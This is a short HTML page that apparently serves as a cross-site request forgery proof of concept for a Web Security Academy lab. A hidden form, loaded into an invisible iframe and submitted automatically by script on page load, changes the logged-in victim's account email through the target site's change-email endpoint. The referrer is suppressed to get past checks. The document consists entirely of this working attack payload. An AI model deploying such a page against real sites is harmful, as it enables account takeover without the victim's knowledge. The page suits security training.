<html>
    <head>
        <meta name="referrer" content="never"> 
    </head>

    <body>
        <h1>Hello world!</h1>
        <iframe style="display:none" name="csrf-iframe"></iframe>
        <form action="https://acd11fbc1fb050118088218e00de0010.web-security-academy.net/my-account/change-email" method = "post" id="csrf-form" target="csrf-iframe">
            <input type="hidden" name="email" value="test5@test.ca">
        </form>

        <script>document.getElementById("csrf-form").submit()</script>
    </body>
</html>